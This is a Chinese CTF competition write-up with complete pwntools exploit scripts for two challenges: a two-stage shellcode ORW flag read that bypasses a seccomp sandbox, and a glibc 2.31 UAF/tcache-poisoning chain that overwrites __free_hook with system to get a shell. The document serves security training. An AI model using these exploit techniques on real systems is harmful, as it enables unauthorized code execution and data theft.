the_balt_and_road_final


抽象的赛制,业余的主办方
一带一路决赛题目附件
[pwn1]ez_pwn2
checksec



开了沙盒（系统调用被过滤，直接起 shell 行不通），所以后面只能用 ORW（open/read/write）把 flag 读出来



程序会把输入读到栈上，然后跳过去执行——也就是可以直接打 shellcode，但跳转目标要自己控制好






比赛中把重点放在了溢出和直接写 shellcode 上，结果没有拿捏住程序的跳转（返回地址该指向哪里）
三个小时里做了很多无用功，后面又去看了下堆题（pwn2），也没解出来；下面是赛后复现的 exp。

from pwn import *
from ctypes import *

# x86-64 target; 'debug' logs every byte sent/received on the tube, which is
# what you want while developing the exploit (switch to 'info' for a quiet run).
context.update(arch='amd64', log_level='debug')

def debug():
    """Attach gdb to the live target ``p`` and block until the user continues.

    Never called by the script as written; call it right before the step you
    want to single-step through.
    """
    gdb.attach(p)
    pause()
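#p = remote("110.110.110.113",49201)
# Gadgets collected while chasing a ROP/overflow route during the contest.
# The final exploit below does not use any of them; kept for reference.
main = 0x4009FC
pop_rbp_ret = 0x4008c0
pop_rdi_ret = 0x400b53
ret = 0x400288
leave_ret = 0x400999
p = process("./ez_pwn2")
elf = ELF("./ez_pwn2")

# The binary leaks a stack address right after 'shh:' ("0x" + 16 hex digits).
p.recvuntil(b'shh:')
stack_addr = int(p.recv(18), 16)
success("stack: %s", hex(stack_addr))

# Stage 1: a tiny read(0, stack_addr, 0x200) stub.  rax (SYS_read = 0) and
# rdi (fd 0 = stdin) are set explicitly instead of relying on whatever the
# previous syscall left in them.  The destination is the leaked stack
# address, so stage 2 lands somewhere we already know how to jump to.
shellcode1 = f'''
xor eax, eax
xor edi, edi
mov rsi, {stack_addr}
mov rdx, 0x200
syscall
'''
payload1 = asm(shellcode1)
if len(payload1) > 0x28:
    raise ValueError("stage-1 stub no longer fits in the 0x28-byte slot")
payload1 = payload1.ljust(0x28, b'A')
payload1 += p64(stack_addr)  # control-flow target: the leaked stack buffer
p.sendline(payload1)

pause()  # window to attach gdb before stage 2 goes out; safe to remove
# Stage 2: the binary is sandboxed (syscall filter, per the writeup), so ORW
# instead of execve.  open('/flag') is assumed to return fd 3 (first free
# descriptor); 0x40 bytes are read onto the stack and written to stdout.
shellcode2 = shellcraft.open('/flag')
shellcode2 += shellcraft.read(3, 'rsp', 0x40)
shellcode2 += shellcraft.write(1, 'rsp', 0x40)
# NOP sled as long as the stage-1 payload, so the jump into stack_addr slides
# into the ORW code.  (The original sent asm(shellcode1) here by mistake --
# it re-sent the read stub and never used shellcode2 at all.)
payload2 = len(payload1) * b'\x90' + asm(shellcode2)
p.sendline(payload2)

p.interactive()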

[pwn2]drunk
很常规的堆题（glibc 2.31，UAF + tcache 投毒，先泄露堆和 libc，最后打 __free_hook）
打的时候没找到那个 backdoor（菜单里隐藏的 888 选项，也就是 exp 里的 bd()）
看来还得学一手修复

from pwn import*
# Live target; swap the two lines below to run against the local binary.
p = remote('110.110.110.113', 49211)
#p = process("./drunk2")
elf = ELF("./drunk2")
libc = ELF("./libc-2.31.so")  # libc shipped with the challenge (glibc 2.31)
# 'debug' logs every byte on the tube; handy while building the chain.
context.update(os='linux', arch='amd64', log_level='debug')

def debug():
    """Attach gdb to the live target ``p`` and block until the user continues.

    Not called by the script as written; drop a call in before the step you
    want to inspect.
    """
    gdb.attach(p)
    pause()

def add(size, payload):
    """Menu option 1: allocate a cup of ``size`` bytes and write ``payload`` into it.

    Per the original note on this helper the binary only accepts
    0 <= size < 0x40, i.e. everything lands in a single tcache bin.
    """
    p.sendlineafter(b"-->>>> ", b'1')
    p.sendlineafter(b"What size cup:", str(size))  # 0 <= malloc < 0x40
    p.sendafter(b"Do you want something to add?", payload)

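def delete(index):
    """Menu option 2: free cup ``index``.

    The binary does not clear the pointer afterwards (UAF) -- the exploit
    leans on that for both the tcache leak and the edit-after-free.
    Delimiters are bytes, matching add(); pwntools warns on str on Python 3.
    """
    p.sendlineafter(b"-->>>> ", b'2')
    p.sendlineafter(b'cup number: ', str(index))  # UAF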

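def edit(index, payload):
    """Menu option 4: refill cup ``index`` with ``payload``.

    Works on freed cups too (see delete), which is how the tcache next
    pointer gets overwritten.  Delimiters are bytes, matching add().
    """
    p.sendlineafter(b"-->>>> ", b'4')
    p.sendlineafter(b"which cup:", str(index))
    p.recvuntil(b"refill")
    p.sendlineafter(b"Now add something", payload)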

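def show(index):
    """Menu option 3: print the contents of cup ``index``.

    The caller reads the leaked bytes off the tube afterwards.  Delimiters
    are bytes, matching add().
    """
    p.sendlineafter(b"-->>>> ", b'3')
    p.sendlineafter(b"Let's see what you can do", str(index))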


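def bd():
    """Select hidden menu option 888 -- the 'backdoor' the writeup mentions.

    The exploit sends it once, before any other menu action.  Payloads are
    bytes, matching the other helpers.
    """
    p.sendlineafter(b'-->>>> \n', b'888')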

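bd()

# --- stage 1: heap leak -------------------------------------------------
# glibc 2.31 stores tcache next pointers unmangled, so showing a freed chunk
# leaks a heap address.
add(0x38, b'A')  # 0
add(0x38, b'B')  # 1
delete(1)
delete(0)        # tcache is LIFO: chunk 0's next now points at chunk 1
show(0)
# NOTE(review): recv(6) assumes the 6 raw pointer bytes are the very next
# thing on the wire after show(); if the binary prints a prefix, recvuntil
# it first.  (The original line here was unparseable -- undefined `data`.)
heap_base = u64(p.recv(6).ljust(8, b'\x00')) - 0x370

# tcache poisoning: point chunk 0's next at the tcache_perthread_struct
# (heap_base + 0x10 is its user data) ...
edit(0, p64(heap_base + 0x10))
# ... and write a 7 into its count array so the target bin reports as full.
# The next free of that size then goes to the unsorted bin, which is what
# the libc leak below needs.  (Which bin offset 0x0e hits depends on the
# struct layout -- verify in gdb if the leak comes back empty.)
pay = b'\x00' * 0x0e + b'\x07'
add(0x38, b'exp1')  # 2  (chunk 0 again)
add(0x38, pay)      # 3  (the tcache struct itself)

# --- stage 2: libc leak -------------------------------------------------
add(0x38, b'A')  # 4
add(0x38, b'B')  # 5
delete(4)
delete(5)
edit(5, p64(heap_base + 0x2a0))  # poison next pointer again
add(0x38, b'6')  # 6  (chunk 5)
add(0x38, b'7')  # 7  -> heap_base + 0x2a0
delete(7)        # tcache "full", so this lands in the unsorted bin
show(7)
# 2018272 == 0x1ecbe0: presumably main_arena+96 (the unsorted-bin fd) in the
# bundled libc-2.31.so -- recompute if the libc changes.  (The original used
# undefined helpers `uu64`/`r` here.)
libc_base = u64(p.recv(6).ljust(8, b'\x00')) - 2018272
__free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
success('heap_base:%s', hex(heap_base))
success('libc_base:%s', hex(libc_base))

# --- stage 3: __free_hook -> system -------------------------------------
add(0x38, b'/bin/sh\x00')  # 8
add(0x38, b'B')            # 9
add(0x38, b'/bin/sh\x00')  # 10
add(0x38, b'B')            # 11
delete(10)
delete(11)
edit(11, p64(__free_hook))  # poison next pointer -> __free_hook
add(0x38, b'/bin/sh\x00')  # 12  (chunk 11 again)
add(0x38, p64(system))     # 13  (this is __free_hook)

# free(ptr) now calls system(ptr).  The original frees index 7; if that
# chunk no longer starts with "/bin/sh", free index 8 or 12 instead.
delete(7)
p.interactive()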